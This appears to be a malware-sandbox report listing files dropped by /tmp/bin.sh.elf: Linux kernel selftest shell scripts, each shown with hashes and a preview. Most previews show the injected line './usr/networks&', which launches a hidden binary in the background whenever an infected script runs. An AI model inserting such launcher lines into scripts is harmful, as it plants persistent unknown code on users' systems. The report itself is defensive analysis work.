                                                                        Preview:./usr/networks&.$MOD_TARGET: ${MOD_TARGET}_exit"...# TEST: module_coming notifier.#.# This test is similar to the previous test, but (un)load the livepatch.# module before the target kernel module. This tests the livepatch.# core's module_coming handler..#.# - On livepatch enable, only pre/post-patch callbacks are executed for.# currently loaded klp_objects, in this case, vmlinux..#.# - When a targeted module is subsequently loaded, only its.# pre/post-patch callbacks are executed..#.# - On livepatch disable, all currently loaded klp_objects' (vmlinux and.# $MOD_TARGET) pre/post-unpatch callbacks are executed...echo -n "TEST: module_coming notifier ... ".dmesg -C..load_lp $MOD_LIVEPATCH.load_mod $MOD_TARGET.disable_lp $MOD_LIVEPATCH.unload_lp $MOD_LIVEPATCH.unload_mod $MOD_TARGET..check_result "% modprobe $MOD_LIVEPATCH.livepatch: enabling patch '$MOD_LIVEPATCH'.livepatch: '$MOD_LIVEPATCH': initializing patching transition.$MOD_LIVEPATCH: pre_patch_callback: vmlinux.livepatch: '
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):239
                                                                        Entropy (8bit):4.593536530803619
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVasWoWbsK3rKCAWRhtmcrWr3rKbVR9htmtFZeLwAdFClveLwAdFcksWP/NJjUE:6WLUTQVHut3zAdGvzAd/sWPTov6viMn
                                                                        MD5:E481DB4C471700714131FC670E4565C8
                                                                        SHA1:31B80732C4799F423A4C77CC7CC287041633DF19
                                                                        SHA-256:95AABAD6F9543FA79A303D67D76111CFBAA9D496AAC5D2FAF3EE90567FC87FB9
                                                                        SHA-512:84AA078169ACD5251C73B95DC74005553D7420F0D780AF6F0AE113464889DEC48D7121119C9762935537CFC08E78466D95769ABB75AE6A027E18AC7791DE0794
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..if /sbin/modprobe -q test-ww_mutex; then. /sbin/modprobe -q -r test-ww_mutex. echo "locking/ww_mutex: ok".else. echo "locking/ww_mutex: [FAIL]". exit 1.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):894
                                                                        Entropy (8bit):4.917046734902346
                                                                        Encrypted:false
                                                                        SSDEEP:24:M0ZrJUueWh3QTwYwisHxr0ETdQxReCrDPe6rs:McUVWkeiFEeXeOy
                                                                        MD5:1EA9500EA2D85C26D5FDB2E83315EE1C
                                                                        SHA1:ECD6138BCC6DFBF9C586527023ECADB57F45E3F2
                                                                        SHA-256:614CB18904DF272F0CEAAF58CBCA8788F1AEAD86DEA60486A93FC5F904C9DE70
                                                                        SHA-512:153135A8D20F6D91F6B04E36F973E2476CDFF14B23D8D6D05C485E6B38A386A73D78EBC42992923D0DD13C1E8A382FF5B137FE613F6605EF7D54DDECFC477F1F
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit $ksft_skip..fi...echo 3 > /proc/sys/vm/drop_caches..echo $(( $hpages_needed + $nr_hugepgs )) > /proc/sys/vm/nr_hugepages..while read name size unit; do...if [ "$name" = "HugePages_Free:" ]; then....freepgs=$size...fi..done < /proc/meminfo.fi..#.# If still not enough huge pages available, exit. But, give back any huge.# pages potentially allocated above..#.if [ $freepgs -lt $hpages_test ]; then..# nr_hugepgs non-zero only if we attempted to increase..if [ -n "$nr_hugepgs" ]; then...echo $nr_hugepgs > /proc/sys/vm/nr_hugepages..fi..printf "Not enough huge pages available (%d < %d)\n" \...$freepgs $needpgs..exit $ksft_skip.fi..#.# Run the hugetlbfs test.#../memfd_test hugetlbfs../run_fuse_test.sh hugetlbfs..#.# Give back any huge pages allocated for the test.#.if [ -n "$nr_hugepgs" ]; then..echo $nr_hugepgs > /proc/sys/vm/nr_hugepages.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):6085
                                                                        Entropy (8bit):5.222118071271236
                                                                        Encrypted:false
                                                                        SSDEEP:96:PS6opte4QrOTqSdLAdJ8OqtVnQWohfmDSohOHvrkd:PSDpte/rO+ShAEO+nQWohfmDSohOHvrg
                                                                        MD5:BC65EE02174F25DA47F67048EE476ECC
                                                                        SHA1:5A0F574368D948305FDD7B560F4AC9F0EB22FB41
                                                                        SHA-256:6487CEF33AA91CA38A6A8C7CE93308E0EF68A267DC99EA1715165661AF3DFBBA
                                                                        SHA-512:1F041350A2F4A632F658B83FE6AD7E8FACF3F69E888FC8C1BE0A5D6044A120648736432950D9A407C59322776B61AF30C0850687E8E634710DA90EF71D6C1420
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit $ksft_skip..fi...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit $ksft_skip..fi...if ! ls $SYSFS/devices/system/memory/memory* > /dev/null 2>&1; then...echo $msg memory hotplug is not supported >&2...exit $ksft_skip..fi...if ! grep -q 1 $SYSFS/devices/system/memory/memory*/removable; then...echo $msg no hot-pluggable memory >&2...exit $ksft_skip..fi.}..#.# list all hot-pluggable memory.#.hotpluggable_memory().{..local state=${1:-.\*}...for memory in $SYSFS/devices/system/memory/memory*; do...if grep -q 1 $memory/removable &&... grep -q $state $memory/state; then....echo ${memory##/*/memory}...fi..done.}..hotpluggable_offline_memory().{..hotpluggable_memory offline.}..hotpluggable_online_memory().{..hotpluggable_memory online.}..memory_is_online().{..grep -q online $SYSFS/devices/system/memory/memory$1/state.}..memory_is_offline().{..grep -q offline $SYSFS/devices/system/memory/memory
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):59
                                                                        Entropy (8bit):4.140763389477654
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVasWoWbPDXVOORgn:6W9Mn
                                                                        MD5:0A5C7A75059C630EEFC22C6F180442A8
                                                                        SHA1:D8EB51C2C827DA1D4F2A859EF36F294D1AF38842
                                                                        SHA-256:7657F8B81C1CFB82399BB4E53F4F23EDC7E0F2F281F4C1569DF650D731ECC4D6
                                                                        SHA-512:214F4D17D813CA80185D1535D611CAE7A1B2DCD0AD9D09C1B2E01D882C6B752CAE6AB5AD96C36E1B5B2236EC3540A1537B818C726BD1C92B9419BAE087EE0825
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):81828
                                                                        Entropy (8bit):5.22489764897402
                                                                        Encrypted:false
                                                                        SSDEEP:768:DP0urh05CFq1eoIvEG7tS9WYiUnOrSNlMcFZAP4j7w22q8r4ajdxaCyqb6XUuHu2:DrO5JUcHVX+VKr
                                                                        MD5:F2F9319BD4E69A0A7C78AFF8875729C4
                                                                        SHA1:AEC8DF0552658E8EC9CB9814F5DBEE4CAE3FEF96
                                                                        SHA-256:2195F36873CB8AAC5278E53D0B94DCA5EB074A57AF51B1E20D8CF955050458BC
                                                                        SHA-512:BB09F77E16941C6F2F869ABE3F8A93E4AC6A905293D0C9F37B2D0AA8F3498D9A5529774644AB9B5C2E36A8256938164690725E72D8C2ECACB6093E131EAFD9C9
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi...kill_procs.}..log_test_addr().{..local addr=$1..local rc=$2..local expected=$3..local msg="$4"..local astr...astr=$(addr2str ${addr})..log_test $rc $expected "$msg - ${astr}".}..log_section().{..echo..echo "###########################################################################"..echo "$*"..echo "###########################################################################"..echo.}..log_subsection().{..echo..echo "#################################################################"..echo "$*"..echo.}..log_start().{..# make sure we have no test instances running..kill_procs...if [ "${VERBOSE}" = "1" ]; then...echo...echo "#######################################################"..fi.}..log_debug().{..if [ "${VERBOSE}" = "1" ]; then...echo...echo "$*"...echo..fi.}..show_hint().{..if [ "${VERBOSE}" = "1" ]; then.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):10482
                                                                        Entropy (8bit):5.520140277320042
                                                                        Encrypted:false
                                                                        SSDEEP:192:Hf6aoUuW2v/DNRoEMUHR+4X4jEdfIok/CJY/JGgU:Cvr8EMWK/Mz
                                                                        MD5:A772B76FFC1B6AB09E9DCD0B874EB213
                                                                        SHA1:66C9D16185128FF2EAB98556B1E8B617678A4353
                                                                        SHA-256:516D962A6E31A455D259BF052DC7E76964126336632243DBFECCB766629A4523
                                                                        SHA-512:869FF3072689E0602B00DD74E561E28FFDC6DD8914EB07D460605977F1968BDC6E83475A27B4494363FACFDBF587568BC4733722575DC2E485174012472B0FF0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_section().{..echo..echo "######################################################################"..echo "TEST SECTION: $*"..echo "######################################################################".}..log_subsection().{..echo..echo "#########################################"..echo "TEST SUBSECTION: $*".}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...printf " COMMAND: $cmd\n"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..get_linklocal().{..local dev=$1..local pfx..local addr...addr=$(${pfx} ip -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..################################################################################.#..setup().{..echo..echo "
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5033
                                                                        Entropy (8bit):5.199543662874075
                                                                        Encrypted:false
                                                                        SSDEEP:96:gcg5COx54mZEExrIKSw0Y/EYNYaB6FCAOTTXs+bFNZlM:0L7rIgnhbJM
                                                                        MD5:616700222685088C7BE53E46E671009B
                                                                        SHA1:01592A677B04EA088572BD7517BE85FCC67F9DDA
                                                                        SHA-256:BF687114D57F8773EFFE0B21D228D9FDD436F3C4CCA8C8A78F7349CA0D465D3D
                                                                        SHA-512:D66A46C098F6A6D08B904D2A7EDFCCF1E3622C1BD1FAA010578C33444B7C49A7D86A3197BBA32DE98683AFC2CDE7BD67357C2E00BA7DA2FBEDDEC9D3815A4073
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...[ "$VERBOSE" = "1" ] && echo.}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...echo "COMMAND: $cmd"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo "$out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..################################################################################.# config..create_ns().{..local ns=${1}...ip netns del ${ns} 2>/dev/null...ip netns add ${ns}..ip -netns ${ns} addr add 127.0.0.1/8 dev lo..ip -netns ${ns} link set lo up...ip netns exec ${ns} sysctl -q -w net.ipv6.conf.all.keep_addr_on_down=1..case ${ns} in..h*)...ip netns exec $ns sysctl -q -w net.ipv6.conf.all.forwarding=0...;;..r*)...ip netns exec $ns sysctl -q -w net.ipv4.ip_forward=1...ip netns exec $ns sysctl -q -w net.ipv6.conf.all.forwarding=1...;;..esac.}..setup().{..local ns..local i...#set -e...for ns in h0 r1 h1 h2 h3..do...create_ns ${ns}..done...#..# create interc
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):30358
                                                                        Entropy (8bit):5.149225654380326
                                                                        Encrypted:false
                                                                        SSDEEP:768:Yc/Gl3JcQwm5jmA+Yfd+tdUaGPVkcnPJ5qmd+ZnJY/b7Bf7hMehv5cRTbicH3d:YciyIj5BnO3d
                                                                        MD5:A5578A1F1D8156012B4F6A0F1A620383
                                                                        SHA1:D04ABFB2D2B5DF70BB011BFF87D48F07BC81BDB9
                                                                        SHA-256:0BBA5B1308425F707409D81F17052E2724A05DE82BA72D4C43BE74214306C244
                                                                        SHA-512:C84CCF52747762F97B9A328271BF183B7BF9CF3809D9727ED6570F79E6962B4C0055919E65CD3D041501AED2F053135A38CC6BA8CE26EF4F016E69BFFCC639C8
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi...[ "$VERBOSE" = "1" ] && echo.}..run_cmd().{..local cmd="$1"..local out..local stderr="2>/dev/null"...if [ "$VERBOSE" = "1" ]; then...printf "COMMAND: $cmd\n"...stderr=..fi...out=$(eval $cmd $stderr)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...return $rc.}..get_linklocal().{..local dev=$1..local ns..local addr...[ -n "$2" ] && ns="-netns $2"..addr=$(ip $ns -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..create_ns().{..local n=${1}...ip netns del ${n} 2>/dev/null...set -e..ip netns add ${n}..ip netns set ${n} $((nsid++))..ip -netns ${n} addr add 127.0.0.1/8 dev lo..ip -netns ${n} link set lo up...ip netns exec ${n} sysctl -qw net.ipv4.ip_forw
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5253
                                                                        Entropy (8bit):5.126957311810008
                                                                        Encrypted:false
                                                                        SSDEEP:96:gNHKMcy4LOgbCQgdqvcY25tOdSg1cgoirS3sJ/7:0TVXKc1DOdHT
                                                                        MD5:4BB9EDAA670B1D47E0EC11BE4B08E4DE
                                                                        SHA1:46D0CD00582D9B173A126C54088E2C5B196517E4
                                                                        SHA-256:5CB74C5B7C9F001C056C13B2C3E4630AF06BFC1D913A0C4AF8DE8DCF67BC4D54
                                                                        SHA-512:C849D92A643332819FB9AA4040418A00F5D28F0BC91EF1605C36822BA4675E2FE374D13681772726B78C01248002050750A140B2E6FB767B6AB65F8A517F65D5
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_section().{..echo..echo "######################################################################"..echo "TEST SECTION: $*"..echo "######################################################################".}..setup().{..set -e..ip netns add testns..$IP link set dev lo up...$IP link add dummy0 type dummy..$IP link set dev dummy0 up..$IP address add $DEV_ADDR/24 dev dummy0..$IP -6 address add $DEV_ADDR6/64 dev dummy0...ip netns exec testns sysctl -w net.ipv4.ip_forward=1...set +e.}..cleanup().{..$IP link del dev dummy0 &> /dev/null..ip netns del testns.}..fib_check_iproute_support().{..ip rule help 2>&1 | grep -q $1..if [ $? -ne 0 ]; then...echo "SKIP: iproute2 iprule too old, missing $1 match"...return 1..fi...ip route get help 2>&1 | grep -q $2..if [ $? -ne 0 ]; then...echo "SKIP: iproute2 get route too old, missing $2 match"...return 1..fi...return 0.}..fib_rule6_del().{..$IP -6 rule del $1..log_test $? 0 "rule6 del $1".}..fib_rul
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46643
                                                                        Entropy (8bit):5.263617494795865
                                                                        Encrypted:false
                                                                        SSDEEP:384:DDi8S2/plzp/TGatEWrT5MZHwkIHTsjPhESASVzinGn52NOx9LIFnkxPJEouSGS3:3TS2/pld/TZn5MZ0NnGn52CMe5moFVt
                                                                        MD5:141675E73A6FF4B0DB5517E32B2C937F
                                                                        SHA1:4435B3658279F13DB9398EB099E4ED8BDA6A3B92
                                                                        SHA-256:C37270657F24ECCCE102B62A059BB54DA0E0AD42F65AAB7DC200E0FA8ACD0E04
                                                                        SHA-512:80A7072F287174993DEC83302550ABED16EC59EB287A6E302A8DA67FE0CA1B9F80474DD466D1889BC9A21761E730FF82B1C08D3EB196E1C71F8315C849B53E66
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi.}..setup().{..set -e..ip netns add ns1..ip netns set ns1 auto..$IP link set dev lo up..ip netns exec ns1 sysctl -qw net.ipv4.ip_forward=1..ip netns exec ns1 sysctl -qw net.ipv6.conf.all.forwarding=1...$IP link add dummy0 type dummy..$IP link set dev dummy0 up..$IP address add 198.51.100.1/24 dev dummy0..$IP -6 address add 2001:db8:1::1/64 dev dummy0..set +e..}..cleanup().{..$IP link del dev dummy0 &> /dev/null..ip netns del ns1..ip netns del ns2 &> /dev/null.}..get_linklocal().{..local dev=$1..local addr...addr=$($IP -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..fib_unreg_unicast_test().{..echo..echo "Single path route test"...setup...echo " Start point"..$IP route ge
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):7257
                                                                        Entropy (8bit):5.29120251291897
                                                                        Encrypted:false
                                                                        SSDEEP:192:b93vnWMdBXmlHwYLHqiJ5a0fB4w5DBmKsJ+9qb4Nx4oQDW4T:pfTdBXmlHwYLKilVhsJ+kMhY
                                                                        MD5:9BFA82C4B02F53428ED7167F9F56A2A1
                                                                        SHA1:5DC8640CCA18426FC7359A0764AD13C3F6DA8432
                                                                        SHA-256:C49AC671BB80966BCDAE01B0746826AB5DC07EB427A3CF45103D409D3E241942
                                                                        SHA-512:1BA3BC90A1BD945ECA85172E50E980F7945EDC030FB0139172A1A49435C4B24DE8941B93623277EDD42AE139A67DB6336970812F348B8646EBA6EA60C8A687B7
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi..if [[ "$(echo $DEVLINK_DEV | grep -c pci)" -eq 0 ]]; then...echo "SKIP: devlink device's bus is not PCI"...exit 1..fi...DEVLINK_VIDDID=$(lspci -s $(echo $DEVLINK_DEV | cut -d"/" -f2) \.... -n | cut -d" " -f3).fi..##############################################################################.# Sanity checks..devlink help 2>&1 | grep resource &> /dev/null.if [ $? -ne 0 ]; then..echo "SKIP: iproute2 too old, missing devlink resource support"..exit 1.fi..devlink help 2>&1 | grep trap &> /dev/null.if [ $? -ne 0 ]; then..echo "SKIP: iproute2 too old, missing devlink trap support"..exit 1.fi..##############################################################################.# Devlink helpers..devlink_resource_names_to_path().{..local resource..local path=""...for resource in "${@}"; do...if [ "$path" == "" ]; then....path="$resource"...else....path="${path}/$resource"...fi..done...echo "$path".}..devlink_resource_get().{..local name=$1..local resource_name=.[][\"$DEV
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
